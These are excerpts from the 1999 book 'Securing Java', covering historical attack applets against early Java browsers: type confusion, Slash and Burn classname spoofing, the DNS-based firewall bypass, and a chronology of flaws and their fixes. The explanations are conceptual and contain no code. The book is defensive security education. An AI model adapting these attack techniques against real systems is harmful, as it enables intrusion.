Figure 5.4 Type-confusion attack. Two of the objects in the reference table, t and u, are supposed to be of different types, but actually reference the same object in memory.
An Example of Type Confusion
Drew Dean discovered a typical type-confusion attack, based on Java's handling of array types. Java allows a program that uses a type T to use the type array of T. These array types are not explicitly declared by the programmer, but exist automatically. The Java Virtual Machine defines them automatically when they are needed. These array types are defined by the VM for internal use. Java gives them a name beginning with an open square bracket ([). As this character is not allowed to be the first character of a programmer-defined classname, there is no danger of conflict. Dean discovered, however, that in Netscape Navigator 3.0beta5, a Java byte code file could declare its own type name to be one of the special array type names. Attempting to load such a class would generate an error, but the Java VM would install the name in its internal table anyway. This redefined one of Java's array types and created a classic type-confusion scenario: Java considered the object an array, but it actually had some other type. The result was full system penetration. This problem was fixed in Navigator 3.0beta6.
The Type-Confusion Toolkit The Princeton team, as a feasibility demonstration, created a toolkit that allows any type-confusion attack to be turned into a disarming of Java's security. In other words, the toolkit serves as a way of turning a small security breach into a complete system penetration. The type-confusion toolkit has not been released to the public and is considered too dangerous to describe in any detail here. The toolkit was recently revised to work against Java 2 systems.
Search the Book Previous Page
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs
Next Page
Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 6 -- Slash and Burn The second set of attacks involves Java code that passes itself off as belonging to the browser. In early versions of the JDK (before Java 2), code that came with the browser was assumed to be safe (see Chapter 2 and [McGraw and Felten, 1996]). The original built-in code distinction was scrapped with the introduction of code signing, and these days very little code is trusted (see Chapter 3). In any case, the Slash and Burn fraud allows the malicious code access it would not ordinarily have. It could, for example, access files on the local disk. In order to properly understand this attack, you need to understand how Java works. In particular, examine how Java accesses its own code on the browser's local disk.
Where Java Code Comes From When a Java applet runs, many Java classes (pieces of Java code) are loaded and run. Some applet-related classes are loaded by the applet, using the Web server. Other classes are part of the browser itself. Browserrelated code is stored with the browser on the local disk. Netscape, for example, keeps its Java class files zipped up in an archive called classes.zip. When Netscape is installed, the class archive needs to be put somewhere special, like /usr/local/lib/netscape on Unix machines. Because the browser classes were considered part of the trusted browser program, they were given more privileges. (This is no longer the case.) In general, before JDK 1.1, Java treated code loaded from the local disk as trusted, and code loaded over the Net as untrusted. That meant if an attacker could somehow get some malicious code loaded from the local disk, the attacker was home free. The original system was changed significantly with the introduction
of JDK 1.0.2, which stopped treating code loaded off the disk as trusted. This change was made behind the scenes with little fanfare. As the Cache Cramming attack (explained later) shows, many people were confused by the change. From our discussion of the Java class loader in Chapter 2, we know that when Java needs to find a piece of code, say, for a class MyClass, it first looks on the local disk for a file called MyClass.class. If Java fails to find an appropriate file on the local disk, then it tries to fetch the file from the Web server that originally provided the applet. We've glossed over one key issue at this point: How does Java know what class to look for? The answer is that a class is only loaded when it is mentioned by another class already resident. This is called dynamic loading. The name of the mentioned class is stored in the Java code for the mentioning class. Java classes have names like security.book.chapter5. When the Java system wants to look up a class on the disk, it translates the dots in the class name into backslashes. The name security.book.chapter5 becomes security\book\chapter5.2 This transformed name is the filename used to search for the file on the local disk.
What Went Wrong: Dots and Slashes If a bad guy wants to pass off a piece of code as trusted (in systems before JDK 1.0.2), two steps must be carried out: 1) Get the malicious code onto the victim's disk, and 2) Trick the victim's browser into loading it. The first part, getting code onto the victim's disk, isn't as difficult as it sounds. For example, some machines have public FTP directories, where anyone can put a file. Alternatively, if the victim is using a shared, public machine, the attacker could get an account on that machine and put the file in that account's home directory. Perhaps the most effective way to inject code is to take advantage of the browser's cache. Most Web browsers keep on-disk copies of recently accessed files. This allows repeated accesses to the same Web documents without continually downloading the documents. Unfortunately, it also gives a malicious applet a way to get a file onto the victim's machine. The applet could load the file across the Net, pretending that it was an image or a sound file. Once this was done, the file would be on the victim's disk in the cache. If the applet knew how the browser organized its cache, it would know where on the victim's disk the file resided. This sneaky trick makes a second appearance in the Cache Cramming attack as well (see page 171). Once the file is on the victim's disk, the attacker tricks the victim's browser into loading the file. Since the browser only looks up classnames in relation to the current directory, the attacker would have to place a
file into the victim's working directory. Filename lookup is relative because Java classnames cannot start with a dot; therefore, the translated name cannot start with a backslash. David Hopwood discovered that Java 1.0.1 and Netscape Navigator 2.01 erroneously allowed a classname to start with a backslash. Such a classname could reference any file on the system, not just those files associated with the browser. For example, a class named \programs.browser.cache.file407 would be looked up on the local disk as \programs\browser\cache\file407. This trick could be used to cause any file on the local disk to be loaded as Java code. Because code loaded from the local disk was trusted (pre-JDK 1.0.2), it could proceed to illegally access the local system. This attack allows full system penetration-the bad guy can do anything at all on the victim's machine.
The Fix This problem was fixed in Netscape Navigator 2.02 and in all Java-enabled versions of Microsoft Internet Explorer. The fix was simple: Prohibit classnames from starting with backslashes (or slashes, as the case may be). It is no longer possible to execute impostor code using the Slash and Burn attack.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 5 -- Jumping the Firewall In the first problem, an attack applet launches network security attacks on other machines. This is something that an attacker could already do before Java came along. The twist is that by embedding the attack into an applet, the bad guy makes the attack come from the machine of an innocent bystander. Example: You're sitting at your desk, happily browsing the Web, and without realizing it, your machine is trying to penetrate the security of a machine down the hall. This kind of confusion is reason enough to use Java as the penetration vehicle, but the culprit has an even better reason for using Java. Many corporate networks protect themselves from Internet intrusion through the use of a firewall. (See Figure 5.1.) If your firewall is well configured, it prevents the mischievous cracker from making direct use of the network to probe the defenses of your machines. The firewall does this by blocking certain types of network traffic from entering the corporate network.
Figure 5.1 A firewall stands between your internal network and the rest of the Internet.
It screens every packet of data coming across the network, allowing only certain kinds of packets through. A firewall is only as effective as the policy it implements.
A Java applet, though, doesn't look suspicious to most firewalls. (This was more true in 1997 than it is today. We discuss the state of the art in applet blocking in Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil.") Many firewalls examine the type of packet, not the contents of the packet. For some firewalls, to block Java applet traffic, a system manager would have to block all Web traffic.1 The fact that your browser requested the applet makes the firewall's job that much trickier. If the applet can open network connections to other machines, it can connect from your machine to another machine behind the firewall. In the current case, the attack originates from the inside rather than the outside. Since the firewall only filters traffic coming from the outside, it is helpless to prevent this sort of attack. This is especially dangerous since many sites have strong firewall protection, but almost no protection against attacks from the inside. In security circles, these sites are jokingly referred to as "crunchy on the outside and chewy in the middle." The people who designed Java-enabled browsers thought of the possibility of inside-the-network attacks, so they made a security rule to prevent it. The rule states: An applet may not open a network connection, except back to the server from which it came. If enforced properly, this rule stops any network probing by applets. Netscape Navigator 2.0 did not enforce this rule properly. In order to understand what went wrong, you need to understand how machines are named on the Internet.
Internet Naming Like people, machines on the Internet need to have names to identify them. Specific names help machines send messages across a network. These names are also numeric addresses. Because these numbers are often difficult to remember, there are two layers of network addressing in the Internet. The Internet Protocol (IP) uses only numeric addresses to communicate between machines. The Domain Name System (DNS) keeps track of how the user-friendly names correspond to the IP numbers used to establish a machine's low-level connections. An IP address is just a number. For example, the Web server at JavaSoft has this numeric address: 11001110000110100011000001100100 in binary notation. IP addresses are often written in decimal form, which looks like 206.26.48.100. When the computers that make up the Internet talk to each other, they identify themselves with the numeric IP addresses. Computers deal naturally with numbers like this, but they are, to say the least, not very user-friendly.
The other sort of Internet names, DNS names, are made for people. They look like java.sun.com, or sandbox.rstcorp.com. These names are made up of often intelligible words strung together with dots to separate them. DNS divides the world up into domains like sun.com (Sun Microsystems) and cs.princeton.edu (the Princeton University Computer Science department). Each domain corresponds to a single administrative entity. It is up to that entity to define names that end in its domain name. For example, the cs.princeton.edu domain is free to define names like elvis.cs.princeton.edu. Anyone can create his or her own domain by registering with an organization called InterNIC and paying a modest fee. The owner of each domain is responsible for providing two DNS server machines that respond to queries about DNS names inside that domain. For example, if someone wants to know the IP address of elvis.cs.princeton.edu, he or she can ask one of the DNS servers for cs.princeton.edu. A single DNS name might refer to several IP addresses. There are two reasons for this. First, a machine might be connected to more than one network, with a separate IP address for each of its connections. Second, there might be several machines providing the same service. For example, espn.sportszone.com might actually correspond to several machines, all providing identical services. Sometimes several DNS addresses refer to the same IP address. For example, a company's Web server www.rstcorp.com and its FTP server ftp.rstcorp.com might actually be the same machine. This makes sense because management might later want to move the two functions onto separate machines. Using two separate names allows them to keep this flexibility.
What Went Wrong: The Java DNS Security Bug To enforce the rule that an applet can connect only to the server from which it originated, the implementers of Java needed a way to check whether the machine an applet wanted to reach was the same as the machine that the applet came from. They did this as follows: ● ●
●
Use DNS to translate the name of the Web server into a list of IP addresses. Use DNS to translate the name of the machine the applet wants to connect to into a list of IP addresses. Compare the two lists. If any address appears in both lists, declare the two machines are the same and allow the connection. If not, declare they are different and refuse the connection.
This way of using DNS to authenticate a host is illustrated in Figure 5.2. Though this approach sounds good at first, it turns out to be too permissive.
Figure 5.2 How Java originally used DNS to make sure that an applet attached only to the machine that served it. The problem is that the check is too lenient.
The following scenario describes what can go wrong. Figure 5.3 shows the scenario visually.
Figure 5.3 How the DNS security bug allows an applet to jump a site's firewall. The figure shows several different snapshots arranged in order of occurrence.
Imagine that a bad guy wants to attack a machine called target.victim.org, with the IP address 10.10.10.2. The bad guy sets up a Web server called www.attacker.org, with IP address 172.16.16.16; then he waits. An unsuspecting person, surfing the Web on stooge.victim.org (IP address 10.10.10.1), happens to visit the attacker's Web site. The site contains a Java applet written by the attacker. The applet is downloaded to stooge.victim.org and run. The applet asks to create a network connection to bogus.attacker.org. Because that name is in the attacker.org domain, the attacker's DNS server is asked to provide an IP address for that machine and is free to provide any IP addresses it likes. The attacker's DNS server slyly returns the pair of addresses (10.10.10.2, 172.16.16.16). Because that list contains the address of the attacker's Web server (172.16.16.16), Java erroneously concludes that www.attacker.org and bogus.attacker.org are really the same machine, so it allows the connection to go ahead. Unfortunately, after verifying the connection is allowed, Java connects to the first address on the list, 10.10.10.2, or target.victim.org. The attacker has achieved his goal: to connect to the target machine. What does the attacker do next? The attacker can systematically probe the defenses of the target machine, looking for weaknesses. Sophisticated tools such as SATAN, Ballista, and ISS even exist to automate this part. If the attacker finds a weakness, the victim could be in big trouble.
The Fix This problem was fixed by simply changing the criterion by which Java decides to allow a connection. The new approach is to store the IP address of the Web server, and allow a connection only to that IP address. This simple and complete solution is implemented in Netscape Navigator versions beginning with 2.01 and all Java-enabled Microsoft Internet Explorer versions. It is no longer possible to jump the firewall with Java using the DNS bug; however, it is important to make sure that you are not using the unpatched Netscape 2.0.
The Reaction
The announcement of this flaw triggered a flurry of press reports, beginning with a story in USA Today. Reporters learned of the flaw from a brief message in the comp.risks forum. The discoverers of the attack were surprised to learn that many reporters monitor comp.risks. It turned out that the existence of this flaw had been postulated independently by Steve Gibbons about four weeks before the announcement. Steve Gibbons had reported the bug to Sun Microsystems, but it was not fixed. After the USA Today article, Sun Microsystems and Netscape said they would fix the bug within days. It was fixed quite quickly. The security researchers who uncovered the DNS attack were surprised to see that the press treated the news as a business story rather than as a technical story. This was probably a naïve point of view. These days, technology reporting, even when discussing noncommercial technology, seems to be considered a branch of business reporting. It was also surprising to see that many news organizations repeated a story that they had read elsewhere without contacting the parties involved and apparently without reconfirming any of the facts! As usual, when information is heard and then repeated, small inaccuracies creep in at each stage. It was sometimes possible to figure out who had copied the story from whom, by tracking small inconsistencies. The USA Today story also triggered a blip in the stock market. Netscape's stock price dropped significantly on the day the story appeared. CNN and the Nightly Business Report attributed the drop to the announcement of this flaw, although there were other factors (for example, the expiration of the postIPO embargo on insider sales) also driving down Netscape's stock that week. In any case, the stock bounced back when it became clear that the product was not irretrievably broken.
Search the Book Previous Page
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help
Next Page
Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 4 -- A Chronology of Problems To date, 16 serious security problems have been discovered in implementations of Java. Table 5.1 lists the holes and their accompanying exploits by name. A brief chronology follows that describes each flaw. These flaws will be discussed in more detail later in this chapter. Some of these flaws allow full system penetration. This means that an attacker could exploit them to do literally anything to your machine, including corrupting your data, reading your private data, injecting a virus, or leaving a trapdoor to reenter your machine at will. Table 5.1 Attack Applets that Exploit Holes in the System
DATE
ATTACK APPLET
February 1996 Jumping the Firewall March 1996
Slash and Burn
March 1996
Applets Running Wild
May 1996
Casting Caution to the Wind
June 1996
Tag-Team Applets
June 1996
You're Not My Type
July 1996
Casting Caution to the Wind (reprise)
August 1996
Big Attacks Come in Small Packages
February 1997 Steal This IP Number
February 1997 Cache Cramming March 1997
Virtual Voodoo
April 1997
The Magic Coat
May 1997
Verifying the Verifier
July 1997
The Vacuum Bug
August 1997
Look Over There
July 1998
Beat the System
February 1996: Drew Dean, Edward Felten, and Dan Wallach at Princeton discovered a flaw in Java's networking software, affecting Netscape Navigator 2.0. This flaw was postulated independently by Steve Gibbons. It could be exploited to launch security attacks on other machines on a private network. This flaw was fixed in Netscape Navigator 2.01. The resulting attack is called Jumping the Firewall. See page 147. This attack resulted in one of the two Java-related CERT alerts [CERT, 1996a]. March 1996: David Hopwood at Oxford University found a flaw that allows an attack that tricks Java into treating the attacker's applet as trusted code. This flaw allowed full system penetration. It affected Netscape Navigator 2.01 and was fixed in Netscape Navigator 2.02. The resulting attack is called Slash and Burn. See page 153. March 1996: The Princeton team (Dean, Felten, and Wallach) found a bug in the Java byte code Verifier and a flaw in the class-loading mechanism. Together, these allowed full system penetration. This problem affected Netscape Navigator 2.01 and was fixed in Netscape Navigator 2.02. The resulting attack is called Applets Running Wild. See page 158. This attack resulted in the second of the two Java-related CERT alerts [CERT, 1996b]. May 1996: Independent consultant Tom Cargill, working with the Princeton team (Dirk Balfanz, Dean, Felten, and Wallach) found a flaw in the implementation of the Java interpreter. This flaw allowed full system penetration. It affected Netscape Navigator 2.02 and Microsoft Internet Explorer 3.0beta1, and was fixed in Navigator 3.0beta3 and Explorer 3.0beta2. The resulting attack is called Casting Caution to the Wind. See page 163. June 1996: Hopwood found another flaw in the interpreter that again allowed full system penetration. This flaw affected Netscape Navigator 3.0beta3 and was fixed in Navigator 3.0beta4. The resulting attack is called Tag-Team Applets. See page 165. June 1996: Balfanz, Dean, and Felten found a flaw in Java's implementation of array types that allowed
full system penetration. This flaw affected Netscape Navigator 3.0beta5 and was fixed in Navigator 3.0beta6. The resulting attack is called You're Not my Type. See page 156. July 1996: Cargill, Balfanz, Dean, and Felten found another implementation flaw in the Java interpreter. This flaw allowed an attacker to mount some attacks on network services on other private-network machines. This flaw affected Netscape Navigator 3.0beta5 and was fixed in Navigator 3.0beta6. This attack is also called Casting Caution to the Wind. See page 163. August 1996: Balfanz and Felten found a flaw in Microsoft's Java implementation. The flaw allowed code in an attack applet to become a member of a security-critical Java package, thus gaining the ability to change various security parameters. This in turn gives the applet full access to the target machine's files and the network. This flaw affected Microsoft Internet Explorer 3.0beta3 and was fixed in Explorer 3.0beta4. The resulting attack is called Big Attacks Come in Small Packages. See page 167. February 1997: A pair of British hacker/consultants, Ben Laurie and Major Malfunction, discovered two separate flaws, one that worked only against Netscape Navigator 3.x and the other that worked only against Microsoft Internet Explorer 3.x. The Microsoft flaw was much more serious than the Netscape flaw. The fact that the attacks were browser specific serves to emphasize that different vendors have different approaches to implementing Java security. To be sure, both vendors are coding to the same specification, but there are many ways to skin a cat. The two attacks are called, Steal This IP Number and Cache Cramming, respectively. See pages 169 and 171. March 1997: Security researchers at JavaSoft discovered a subtle error in the JVM and immediately patched it. This illustrates how serious JavaSoft is about security. The error was deep inside the Virtual Machine code and affected all browsers. The attack is called Virtual Voodoo. See page 172. April 1997: Soon after the release of JDK 1.1, the Princeton team discovered a serious flaw in the newly implemented code-signing system. The flaw allowed an attack applet to take on maximum privilege allocated inside a system. Because only the HotJava browser supported JDK 1.1, it was the only browser affected by the flaw. This attack is called The Magic Coat. See page 172. May 1997: The Kimera group at the University of Washington, led by Professor Brian Bershad, created a byte code Verifier of their own using formal methods and strict software engineering processes. In order to test their implementation, the Kimera group created an automatic test harness that generated millions of tests by mutation. They then tested their Verifier against commercially available Verifiers. In the course of testing, they identified 27 errors in various commercial Verifiers. One error was severe enough to warrant a patch. The others were patched in later releases of the JDK. This set of attacks is called Verifying the Verifier. See page 174. July 1997: Sun's response to the Verifier errors in May (which downplayed their severity) prompted the Kimera group to create an exploit that attacked Netscape Navigator 3.x. The attack was able to gain access to protected information in the browser's memory space, including private keys used in setting up secure
socket layer (SSL) sessions. This attack is called the Vacuum Bug. See page 177. August 1997: Creative Concepts consultant Ben Mesander discovered a weakness in the way HTTP redirect operations were handled by Java. The weakness was particularly obvious in Microsoft Internet Explorer 3.x but was also present (in a subtler fashion) in Netscape Navigator 3.x. This attack is called Look Over There. See page 178. July 1998: Balfanz, Dean, Felten, and Wallach found a security flaw in the ClassLoader implementation of JDK 1.1 and JDK 1.2beta3 that allows a malicious ClassLoader to override the definition of built-in "system" types like java.lang.Class. When properly abused, this can lead to a type confusion attack that completely compromises security. The flaw requires use of a secondary flaw to gain a foothold. Mark LaDue had earlier discovered such a flaw in Netscape 4.0x's Security Manager. Thus, Netscape 4.0x is exploitable, while other Java VMs (Sun's and Microsoft's) do not appear to be exploitable even though they contain the same flaw. This attack is called Beat the System. See page 182. The rest of this chapter describes these flaws in more detail.
When Holes Happen The chronology presented here has an interesting meta-level property. Both in August 1996 and in August 1997 several months followed in which no major security holes were discovered. Interestingly, the period of six months in late 1996 was of long enough duration that some Java evangelists began to claim that all Java holes had been discovered and that Java was completely secure. They were wrong. First of all, anyone who claims any program or programming language is completely secure should be viewed with suspicion. There is no such thing as 100-percent security; the best we can do is minimize risk. This goes for Java as well as any other computer system. Fortunately, Java mitigates many risks that competing systems of mobile code like ActiveX and JavaScript do not (see Chapter 1, "Mobile Code and Security: Why Java Security Is Important," for details). This makes Java more secure than those systems, but it does not make Java perfectly secure. Short of proving Java correct (which is unlikely ever to happen given the state of formal methods), we must live with potential security holes. Second, the pattern in the chronology corresponds with major releases of the JDK. The gap between August 1996 and February 1997 included the time period when JDK 1.02 was in common use and JDK 1.1 had not yet been released. As soon as JDK 1.1 was released, some new holes were discovered. The same sort of gap appeared as Java 2 slowly trickled out. This reflects two facts: 1) each major release includes much new functionality, and 2) Java is complicated, and complicated systems always include room for error. From these facts, it is natural to infer that the discovery of holes will coincide with major releases.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Previous Page
Section 3 -- What Applets Aren't Supposed to Do
Next Page
Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," and Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," discussed the Java security model at length. Java's designers tried to ensure that untrusted or partially trusted applets could not misbehave by placing them in an adjustable sandbox. For a concise listing of things that untrusted Java applets should not be allowed to do, see Chapter 2. It is also worth reading the "Frequently Asked Questions-Java Security'' Web page served by Sun Microsystems at java.javasoft.com/sfaq. In order to provide concrete examples of Java security policies that work, Sun's Security FAQ page includes pointers to a number of applets that cannot get around Java security. The good news is that some straightforward approaches to breaching security will fail. The bad news is that crackers usually don't give up after the straightforward approach fails. Fortunately, neither do security researchers. It is always interesting to get an objective outsider's opinion about Java security. That is probably one of the reasons you are reading this book. Appendix A, "Frequently Asked Questions: Java Security, Java versus ActiveX," includes a hard copy of two of the Princeton Secure Internet Programming team's Java Security FAQs. An up-to-the-minute version of the FAQs can be found at www.cs.princeton.edu/sip/javafaq.html.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 2 -- Attack Applets It is important to reemphasize that the attacks described in this chapter are not hypothetical; each has been implemented by either the Secure Internet Programming team (SIP) at Princeton University or other researchers. Each was successfully used to break into a machine in the laboratory. The Princeton team, who have discovered a majority of known holes, choose not to release the resulting attack applets onto the Net. Other researchers, especially consultants, tend to release their attacks. Attack applets are the most dangerous kind of hostile applets. They do more than simply annoy or deny service. The end result of an attack applet is the same as being hacked by a cracker: Your system is wide open for unauthorized access. According to both our research and that of the CERT Coordination Center (an organization that keeps track of computer security violations on the Internet), there have been no confirmed reports of loss due to the attacks described in this chapter. There are, however, a few cases of attacks possibly carried out with applets. It is, of course, impossible to rule out the possibility of attacks that haven't been discovered or that haven't been reported. The lack of reports indicates that the number of attacks, if any, has been small. Successfully implemented attack applets probably haven't occurred in the wild, but there can be no guarantee that one won't show up tomorrow. The danger is real enough that CERT recommends people disable Java when using particular versions of popular browsers [CERT, 1996a; CERT, 1996b].
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Previous Page
Section 1 -- Implementation Errors or Specification Errors?
Next Page
One question we are commonly asked is whether Java's security woes are due to simple bugs or reflect deeper design problems. The answer is a bit complicated, as we shall see.
Software Engineering Meets Internet Time Software that is properly engineered goes through a standard process from requirements design, through detailed specification, to actual implementation. In the world of consumerware (software created for the mass consumer market, like browsers and JDKs), pressure to be first to market and retain what is known as "mind share" compresses the development process so much that software engineering methods are often thrown out the window. This is especially true of testing, which regularly ends up with no scheduled time and few resources. An all too common approach is to leave rigorous testing to users in the field (sometimes even paying users when they find bugs!). We think this is just awful. The Internet time phenomenon has exacerbated the software engineering problem. These days, Internet years rival dog years in shortness of duration (the standard ratio is seven dog years to one regular year). So three months of regular time are currently equivalent to a complete Internet "year." Given the compressed development schedules that go along with this accelerated kind of calendar, the fact that specifications are often very poorly written (if they exist at all) is not surprising. The authors commonly encounter popular consumer-oriented systems that have no specifications. Java suffered from this problem in its early years as well. Fortunately, Java does have an informal specification today. That's always a good start. One of the most common misconceptions about Java security holes is that they are all simple
implementation errors and that the specification has been sound and complete since day one. Threads in the newsgroup comp.lang.java.security and other newsgroups often repeat this fallacy as people attempt to trivialize Java's security holes. The truth is that many of the holes described in this chapter are simple implementation bugs (the code-signing hole from April 1997 comes to mind-see The Magic Coat later in the chapter), but others, like problems discovered in Java class loaders, are not. Sometimes the specification is just plain wrong and must be changed. As an example, consider how the Java specification for class loading has evolved. Often it is hard to determine whether a security hole is an implementation problem or a specification problem. Specifications are notoriously vague. Given a vague specification, who is to blame when a poor implementation decision is made? Specifications are also very often silent; that is, when a hole is discovered and the specification is consulted, there is nothing said about the specific problem area. These sorts of omissions certainly lead to security problems, but are the resulting problems specification problems or implementation problems? In the end, the holes are fixed, regardless of whether they are implementation bugs or design-level problems. This leads to a more robust system. If Java stood still long enough, you would think all the holes would be discovered and fixed. But Java is far from still. With every major JDK release, the Java source code has doubled in size. Much new functionality has been added to the language, some of which has important security implications. The addition of flexible access control in Java 2 is a case in point. Implementing a code-signing and access-control system is nontrivial, and the code is certainly securitycritical. Other examples are serialization and remote method invocation (RMI). Subtle security problems are likely to be discovered in these and other new Java subsystems.
Discovering Holes Why is it that all the known attack applets covered in this chapter were discovered by good guys and not bad guys? The quick but unsettling answer is: pure luck. The Princeton team and other Java security researchers are not the smartest people in the world (sorry guys), and the holes uncovered in Java so far do not require years of advanced training to find. There is no reason that malicious crackers could not discover such holes for themselves. The Java industry has been fortunate that the people who usually discover Java security problems are honest and want to see Java improved so that it is safer to use. Also fortunate is the punctuality and accuracy of typical vendor response. So how are holes usually discovered? Most often, the scenario goes something like this. Researchers discuss where potential flaws may lie by thinking about what is difficult to implement properly. Occasionally, researchers notice peculiar or surprising behavior in their work with Java and get an idea about what to investigate. The next step is to take a close look at the Java source code (for the VM and API classes) or the binary code if no source code is available. Sometimes, errors are obvious and exploits are easy. Other times, experimentation is required to turn a potential flaw into a real exploit. All of the holes described in this chapter can be exploited using attack applets. That means the holes covered here
are not esoteric flaws that are impossible to exploit. They are sometimes-subtle flaws that have been turned into full-fledged attacks.
Holes and Exploits Every Java hole described in this chapter has an accompanying exploit. Another way of putting this is that there is an attack applet (the Java form of an exploit script) for each hole discussed here. However, the oneto-one correlation found in this chapter does not imply that it is necessary for every security hole to have an exploit. Holes are just vulnerabilities. Sometimes a hole will be recognized as a hole but cannot be exploited by itself. In these cases, multiple holes together create an exploit. Think of attacking a system as climbing up a cliff. When you reach the top, you have successfully completed an attack. A security hole can be likened to a piton in the cliff with a piece of rope attached. Sometimes one piton is enough to help a climber make it to the top (especially if the climber is an experienced veteran). Other times, more than one piton may be needed. The holes discussed in this chapter have exploits of both categories. A majority of the attack applets require only one hole, but sometimes an attacker must leverage other weaknesses to exploit a hole. (A perfect example of the latter category is the Beat the System hole of July 1998.)
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Previous Page
The Base Java Security Model: The Original Applet Sandbox
Next Page
Java is designed so that programs can be dynamically loaded over the network and run locally. This very powerful paradigm promises to change the face of computing as we know it. A browser that can interpret Java byte code (such as Netscape Navigator or Internet Explorer) can download and locally execute applets that are embedded in a Web page. This activity of downloading and executing is completely automatic, requires no user approval, and sometimes occurs without the user even knowing. Remember, by simply pointing your browser at a Web page containing an applet, you start Java. Any applet started in this fashion is not required to advertise its presence. More and more Java applets appear on the Web every day. Applets are becoming ubiquitous. This means that surfing the Web with a Java-enabled browser is a more risky activity than surfing the Web in the days before Java. It is extremely unlikely that all users of Java-enabled browsers will consider the security implications of surfing a site before each Web page access. If the mobile code paradigm is going to work, security concerns should be addressed in the language of the content itself. That way, users will not need to worry too much about security. Java's designers took this task to heart. One of their fundamental concerns was making the use of Java transparent, automatic, and above all, safe. As a result, Java was developed with key security issues in mind. It is clear that the Java development environment attempts to address the security problems introduced by the idea of dynamically downloading and running external, untrusted code. To what extent Java succeeds in this task is a subject of debate. Security concerns have always been one of the major technical stumbling blocks to achieving safe mobile code. Java took these concerns seriously and made a good effort to protect Web users. In this chapter, we present the original (or base) Java security model and discuss how it mitigates some of the risks that applets introduce. The original Java security model presented in this chapter implements a sandbox that imposes strict controls on what certain kinds of Java programs can and cannot do. To the extent that the sandbox works, it allows a user to run untrusted code safely. As we discussed in Chapter 1, "Mobile Code and Security: Why Java Security Is Important," an alternative approach to handling mobile code is to run only code that is trusted. ActiveX controls, for example, are omnipotent and should be run only when you completely
trust the entity (person or corporation) that signed the control. It is clear that future mobile code systems will involve both a sandbox model and a trust model based on code signing. In fact, the two will likely be so intertwined that they cannot be easily teased apart. This is already happening in Java. There are many ways to impose a sandbox model on executable content-Java presents just one. Since the Java sandbox model has been widely distributed to millions of users with their Web browsers, it is safe to say that the Java sandbox is today's most widely used sandbox model. Until recently, it was correct to assume that a Java sandbox placed particular constraints on Java applets. JDK 1.1 changed all that; and as we pointed out in Chapter 1, the notion of a sandbox is becoming ever more complex. With the introduction of JDK 1.1, Java's sandbox model underwent a state transition from a required model applied equally to all Java applets to a malleable system that could be expanded and personalized on an applet-by-applet basis. The addition of code signing to Java complicates things immensely. As it now stands, the Java sandbox we detail in this chapter has been reduced to a default. Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," discusses how things work when this default sandbox policy is not used.
Chapter Two Sections 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13.
Potential Threats What Untrusted Java Code Can't Do What Untrusted Java Code Can Do The Java Language and Security The Three Parts of the Default Sandbox The Verifier The Class Loader Architecture The Security Manager Different Classes of Security Type Safety Browser-Specific Security Rules The Fundamental Tradeoff Is There Really a Java Security Policy?
Search the Book Previous Page
Search Help
Next Page
